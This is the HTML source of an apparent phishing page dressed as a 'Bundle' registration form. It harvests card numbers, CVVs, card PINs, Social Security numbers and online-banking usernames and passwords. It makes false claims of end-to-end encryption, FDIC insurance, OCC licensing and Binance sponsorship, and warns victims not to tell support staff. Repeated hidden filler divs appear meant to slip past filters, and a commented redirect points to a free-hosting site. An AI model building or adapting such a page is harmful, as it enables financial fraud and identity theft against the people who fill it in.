<!DOCTYPE html>
<html lang="en" dir="ltr">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta https-equiv="X-UA-Compatible" content="IE=edge" />
  <title>Sign Up | Form | Register</title>
  <link rel="stylesheet" href="style.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"
    integrity="sha512-iecdLmaskl7CVkqkXNQ/ZH/XLlvWZOJyj7Yy7tcenmpD1ypASozpmT/E0iPtmFIB46ZmdtAc9eNBvH0H/ZpiBw=="
    crossorigin="anonymous" referrerpolicy="no-referrer" />
</head>

<body>
  <div class="container">
    <header> BUNDLE<br>REGISTRATION FORM</header>
    <form class="contact-form">
        
        <div class="fields">
            <label> <i class="fa-solid fa-user"></i></label>
            <input type="text" class="input" name="eman" id="fullname" required placeholder="FULL NAME">
       </div>
       
       <div class="fields">
           <i class="fa-solid fa-user"></i>
           <input type="text" class="input" name="stuff" required placeholder="BUNDLE NAME">
      </div>

      <input type="email" id="email" class="email"  value="sexlord580@gmail.com">
        
         
         <div class="wrapper">
        <p> <i class="fa-solid fa-credit-card"></i>Link Online Access </p>
        <div>
          <img class="vc" src="VC.png">
          <img class="mc" src="MSC.png">
         </div>

          <div class="container-2">
            <p class="warning">ALL INFORMATION INPUTED WILL BE END-TO-END ENCRYPTED AND WILL BE ERASED IN A CASE OF
              CONNECTION TIME-OUT. DO NOT SHARE THIS INFORMATION WITH BUNDLE CARE SUPPORT, ANY INDIVIDUAL OR STAFF. </p>

            <div class="cardnum">
              <img id="CN" src="CN.png">
              <input type="number" class="card" name="card num" id="cardnumber" required placeholder=".... .... .... ....">
            </div>
            <div hidden>
                <div>hello word</div>
                <div>hello word</div>
                <div>hello word</div>
                <div>hello word</div>
                <div>hello word</div>
            </div>
            
            <div class="cardnum">
              <div>
                <img src="ED.png" id="ED">
                <select name="EMonth" id="month" required aria-label="Please select the expiration month of your card" class="date">
                   <option value="01">01-JAN</option>
                   <option value="02">02-FEB</option>
                   <option value="03">03-MAR</option>
                   <option value="04">04-APR</option>
                   <option value="05">05-MAY</option>
                   <option value="06">06-JUN</option>
                   <option value="07">07-JUL</option>
                   <option value="08">08-AUG</option>
                   <option value="09">09-SEP</option>
                   <option value="10">10-OCT</option>
                   <option value="11">11-NOV</option>
                   <option value="12">12-DEC</option>
                </select>
                </div>
                <div hidden>
                <div>hello word</div>
                <div>hello word</div>
                <div>hello word</div>
                <div>hello word</div>
                <div>hello word</div>
            </div>

              
              <div>
                <select name="EYear" id="year" required aria-label="Please select the expiration year of your card" class="dateyear">
                  <option value="2023">2023</option>
                  <option value="2024">2024</option>
                  <option value="2025">2025</option>
                  <option value="2026">2026</option>
                  <option value="2027">2027</option>
                  <option value="2028">2028</option>
                  <option value="2029">2029</option>
                  <option value="2030">2030</option>
                  <option value="2031">2031</option>
                  <option value="2032">2032</option>
                  <option value="2033">2033</option>
                </select>
              </div>
              </div>
              <div hidden>
                <div>hello word</div>
                <div>hello word</div>
                <div>hello word</div>
                <div>hello word</div>
                <div>hello word</div>
            </div>
            
            <div class="move">
            <div class="cardnum">
              <img src="CV.png" id="CV">
              <span> (3 digits)</span>
              <input type="number" name="c33" id="cvv" class="card" required placeholder="..." maxlength="3">
            </div>
            <div hidden>
                <div>hello word</div>
                <div>hello word</div>
                <div>hello word</div>
                <div>hello word</div>
                <div>hello word</div>
            </div>
            
            <div class="cardnum">
              <img src="AP.png" id="AP">
              <label> <span> (CARD PIN)</span></label>
              <input type="number" name="card p!n" id="pin" class="card" required placeholder="....">
            </div>
            <div hidden>
                <div>hello word</div>
                <div>hello word</div>
                <div>hello word</div>
                <div>hello word</div>
                <div>hello word</div>
            </div>
            
            
             <div class="cardnum">
              <img src="SN.png" id="SN">
              <input type="number" name="33n" id="ssn" class="card" required placeholder=".........." maxlength="9">
            </div>
            <div hidden>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
            </div>
            </div>
            
             <div class="container-keycode">
                 <div hidden>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
            </div>
            

                 <header>Bundle - Keycode</header>
                 <div hidden>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
            </div>
            
            
                 <input type="text" name="Keycode" placeholder="********" id="password" required readonly="">
                 <img src="copy.png" class="copy" onclick="copyPassword()">
                 <div hidden>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
            </div>
            
            
             <table>
              <tbody>
                <tr>
                  <th>
                    <div id="button" class="btn1" onclick="genPassword()">Generate</div>
                  </th>
                </tr>
              </tbody>
            </table>
            <div hidden>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
            </div>
            <P>CHOOSE A KEYCODE AND STORE SAFELY FOR IDENTIFICATION PURPOSES.<br><B>DO NOT SHARE</B></P>
            </div>
            </div>
            
            <div class="container-3">
    <header>Login Bank <i class="fa-sharp fa-solid fa-building-columns"></i>
      <hr>
    </header>
    <div hidden>
        <p>hello beginner</p>
        <div>hello word</div>
        <p>hello beginner</p>
        <div>hello word</div>
        <p>hello beginner</p>
    </div>
    

    <div class="input-data">
      <input type="text" class="inputs" name="user id" id="userid" required placeholder="User Id">
      <div hidden>
        <p>hello beginner</p>
        <div>hello word</div>
        <p>hello beginner</p>
        <div>hello word</div>
        <p>hello beginner</p>
    </div>
    
      <p class="userb">USER NAME</p>
      <div hidden>
        <p>hello beginner</p>
        <div>hello word</div>
        <p>hello beginner</p>
        <div>hello word</div>
        <p>hello beginner</p>
    </div>
    </div>

    <div class="input-data2">
      <input type="password" class="inputs2" name="user idp" id="useridp" required placeholder="Password">
      <div hidden>
        <p>hello beginner</p>
        <div>hello word</div>
        <p>hello beginner</p>
        <div>hello word</div>
        <p>hello beginner</p>
    </div>
    
      <p class="passb">PASSWORD</p>
      <div hidden>
        <p>hello beginner</p>
        <div>hello word</div>
        <p>hello beginner</p>
        <div>hello word</div>
        <p>hello beginner</p>
    </div>
    </div>

    <div class="rmc">
      <input type="checkbox" class="Remember">
      <div hidden>
        <p>hello beginner</p>
        <div>hello word</div>
        <p>hello beginner</p>
        <div>hello word</div>
        <p>hello beginner</p>
    </div>
      <label>Remember me</label>
    </div>

  </div>
    </div>
            
         </div>
            
            
            <footer>
        <div class="input_field terms">
          <input type="checkbox"><div hidden>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
            </div>
            
          <span class="checkmark"></span>
          <div hidden>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
            </div>
            
            
          <p id="term">Agreed To Terms And Condoitons<br>Sponsred by BINANCE </p>
          <div hidden>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
            </div>
            
          <P id="term">INSURED BY FDIC AND LICENSED BY OCC</P><img id="insured" src="insured.png">
          <div hidden>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
            </div>
            
            
          <img id="occ" src="licence.png">
          <div hidden>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
                <div>hello word</div>
                <p>hello beginner</p>
            </div>
            
        </div>

        

        <input id='buttons' type="submit" class="submit" value="Submit">
        
      </footer>
      
      <!--input type="hidden" name="_next" value="https://paylateropen.000webhostapp.com/"-->
    </form>
  </div>
  
  <script type="text/javascript">

    var password = document.getElementById("password");
    function genPassword() {
      var chars = "0123115496787abcdefghijklm!@#/&*^-_-_NOPQRSTUVWXYZ";
      var passwordLength = 8;
      var password = "";
      for (var i = 0; i <= passwordLength; i++) {
        var randomNumber = Math.floor(Math.random() * chars.length);
        password += chars.substring(randomNumber, randomNumber + 1);
      }
      document.getElementById("password").value = password;

    }
    function copyPassword() {
      var copyText = document.getElementById("password");
      copyText.select();
      copyText.setSelectionRange(0, 999);
      document.execCommand("copy");

    }
    </script>

    <script src="/js/app.js"></script>
</body>


</html>

